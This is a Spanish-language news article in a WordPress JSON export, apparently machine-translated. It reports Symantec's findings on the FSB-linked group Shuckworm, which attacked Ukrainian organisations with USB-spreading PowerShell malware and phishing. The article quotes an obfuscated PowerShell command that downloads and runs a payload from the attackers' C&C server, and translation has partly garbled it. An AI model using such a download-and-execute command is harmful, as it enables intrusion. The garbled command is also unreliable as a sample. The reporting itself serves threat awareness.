\n<\/aside>\n<\/p>\n
Los piratas inform\u00e1ticos que trabajan para el Servicio de Seguridad Federal de Rusia han montado m\u00faltiples ataques cibern\u00e9ticos que utilizaron malware basado en USB para robar grandes cantidades de datos de objetivos ucranianos para usarlos en su invasi\u00f3n en curso de su vecino m\u00e1s peque\u00f1o, dijeron los investigadores.<\/p>\n
\u201cLos sectores y la naturaleza de las organizaciones y m\u00e1quinas objetivo pueden haber dado a los atacantes acceso a cantidades significativas de informaci\u00f3n confidencial\u201d, escribieron investigadores de Symantec, ahora propiedad de Broadcom, en una publicaci\u00f3n del jueves. \u201cHubo indicios en algunas organizaciones de que los atacantes estaban en las m\u00e1quinas de los departamentos de recursos humanos de las organizaciones, lo que indica que la informaci\u00f3n sobre las personas que trabajan en las diversas organizaciones era una prioridad para los atacantes, entre otras cosas\u201d.<\/p>\n
El grupo, que Symantec rastrea como Shuckworm y otros investigadores llaman Gamaredon y Armageddon, ha estado activo desde 2014 y ha estado vinculado al FSB de Rusia, el principal servicio de seguridad de ese pa\u00eds. El grupo se enfoca \u00fanicamente en obtener inteligencia sobre objetivos ucranianos. En 2020, los investigadores de la firma de seguridad SentinelOne dijeron que el grupo de pirater\u00eda hab\u00eda \u00abatacado a m\u00e1s de 5000 entidades individuales en Ucrania, con un enfoque particular en las \u00e1reas donde est\u00e1n desplegadas las tropas ucranianas\u00bb.<\/p>\n
En febrero, Shuckworm comenz\u00f3 a implementar una nueva infraestructura de comando y control de malware que ha penetrado con \u00e9xito las defensas de m\u00faltiples organizaciones ucranianas en el ej\u00e9rcito, los servicios de seguridad y el gobierno de ese pa\u00eds. Los miembros del grupo parecen m\u00e1s interesados \u200b\u200ben obtener informaci\u00f3n relacionada con informaci\u00f3n militar confidencial que podr\u00eda ser objeto de abuso en la invasi\u00f3n en curso de Rusia.<\/p>\n
Esta nueva campa\u00f1a present\u00f3 un nuevo malware en forma de un script de PowerShell que propaga Pterodo, una puerta trasera creada por Shuckworm. El script se activa cuando las unidades USB infectadas se conectan a las computadoras objetivo. El script malicioso primero se copia a s\u00ed mismo en la m\u00e1quina de destino para crear un archivo de acceso directo con la extensi\u00f3n rtf.lnk. Los archivos tienen nombres como video_porn.rtf.lnk, no_eliminar.rtf.lnk y evidencia.rtf.lnk. Los nombres, que en su mayor\u00eda est\u00e1n en ucraniano, son un intento de atraer a los objetivos para que abran los archivos para que instalen Pterodo en las m\u00e1quinas.<\/p>\n\n Anuncio <\/span> <\/p>\n<\/aside>\nEl script contin\u00faa enumerando todas las unidades conectadas a la computadora de destino y se copia a s\u00ed mismo en todas las unidades extra\u00edbles adjuntas, muy probablemente con la esperanza de infectar cualquier dispositivo con espacio de aire, que intencionalmente no est\u00e1 conectado a Internet en un intento de evitar que siendo hackeado<\/p>\n
Para cubrir sus huellas, Shuckworm ha creado docenas de variantes y ha rotado r\u00e1pidamente las direcciones IP y la infraestructura que usa para comando y control. El grupo tambi\u00e9n utiliza servicios leg\u00edtimos como Telegram y su plataforma de microblogging Telegraph para comando y control en otro intento de evitar la detecci\u00f3n.<\/p>\n
Shuckworm generalmente usa correos electr\u00f3nicos de phishing como un vector inicial en las computadoras de los objetivos. Los correos electr\u00f3nicos contienen archivos adjuntos maliciosos que se hacen pasar por archivos con extensiones, incluidas .docx, .rar, .sfx, lnk y hta. Los correos electr\u00f3nicos a menudo usan temas como conflictos armados, procesos penales, lucha contra el crimen y protecci\u00f3n de los ni\u00f1os como se\u00f1uelos para lograr que los objetivos abran los correos electr\u00f3nicos y hagan clic en los archivos adjuntos.<\/p>\n
Los investigadores de Symantec dijeron que una computadora infectada que recuperaron en la campa\u00f1a era t\u00edpica por la forma en que funciona. Ellos escribieron:<\/p>\n
\nEn una v\u00edctima, la primera se\u00f1al de actividad maliciosa fue cuando el usuario pareci\u00f3 abrir un archivo RAR que probablemente se entreg\u00f3 a trav\u00e9s de un correo electr\u00f3nico de phishing y que conten\u00eda un documento malicioso.<\/p>\n
Despu\u00e9s de abrir el documento, se observ\u00f3 que se ejecutaba un comando malicioso de PowerShell para descargar la carga \u00fatil de la siguiente etapa del servidor C&C de los atacantes:<\/p>\n
\u00abCSIDL_SYSTEMcmd.exe\u00bb \/c inicio \/min \u00ab\u00bb powershell -w oculto \u00ab$gt=\u00bb\/obtener.\u00bb+[char](56+56)+[char](104)+[char](112);$hosta=[char](50+4 8);[system.net.servicepointmanager]::servidorcertificadovalidaci\u00f3nllamadab ack=$true;$hosta+=’.vafikgo.’;$hosta+=[char](57+57);$hosta+=[char]( 60+57);$direcciones=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.ad lista de vestidos[0];$cliente=(nuevo-objeto net.webclient);$faddr=\u00bbhtt\u00bb+’ps:\/\/’+$addr+$gt;$text=$client.descargas tring($faddr);iex $texto\u00bb<\/p>\n
M\u00e1s recientemente, Symantec ha observado que Shuckworm aprovecha m\u00e1s direcciones IP en sus scripts de PowerShell. Este es probablemente un intento de evadir algunos m\u00e9todos de seguimiento empleados por los investigadores.<\/p>\n
Shuckworm tambi\u00e9n contin\u00faa actualizando las t\u00e9cnicas de ofuscaci\u00f3n utilizadas en sus scripts de PowerShell en un intento de evitar la detecci\u00f3n, con hasta 25 nuevas variantes de los scripts del grupo observadas por mes entre enero y abril de 2023.<\/p>\n<\/blockquote>\n
La publicaci\u00f3n del jueves incluye direcciones IP, hash, nombres de archivos y otros indicadores de compromiso que las personas pueden usar para detectar si han sido atacados. La publicaci\u00f3n tambi\u00e9n advierte que el grupo representa una amenaza que los objetivos deben tomar en serio.<\/p>\n
\u201cEsta actividad demuestra que el enfoque implacable de Shuckworm en Ucrania contin\u00faa\u201d, escribieron. \u201cParece claro que los grupos de ataque respaldados por el estado-naci\u00f3n ruso contin\u00faan apuntando con l\u00e1ser a los objetivos ucranianos en un intento de encontrar datos que puedan ayudar a sus operaciones militares\u201d.<\/p>\n<\/p><\/div>\n
\nSource link-49<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"im\u00e1genes falsas Los piratas inform\u00e1ticos que trabajan para el Servicio de Seguridad Federal de Rusia han montado m\u00faltiples ataques cibern\u00e9ticos que utilizaron malware basado en USB para robar grandes cantidades…<\/p>\n","protected":false},"author":1,"featured_media":685603,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21980],"tags":[2102,419,9844,6692,8,848,104,9151,110,23551,210,16,24415],"_links":{"self":[{"href":"https:\/\/magazineoffice.com\/wp-json\/wp\/v2\/posts\/685602"}],"collection":[{"href":"https:\/\/magazineoffice.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/magazineoffice.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/magazineoffice.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/magazineoffice.com\/wp-json\/wp\/v2\/comments?post=685602"}],"version-history":[{"count":1,"href":"https:\/\/magazineoffice.com\/wp-json\/wp\/v2\/posts\/685602\/revisions"}],"predecessor-version":[{"id":685604,"href":"https:\/\/magazineoffice.com\/wp-json\/wp\/v2\/posts\/685602\/revisions\/685604"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/magazineoffice.com\/wp-json\/wp\/v2\/media\/685603"}],"wp:attachment":[{"href":"https:\/\/magazineoffice.com\/wp-json\/wp\/v2\/media?parent=685602"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/magazineoffice.com\/wp-json\/wp\/v2\/categories?post=685602"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/magazineoffice.com\/wp-json\/wp\/v2\/tags?post=685602"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}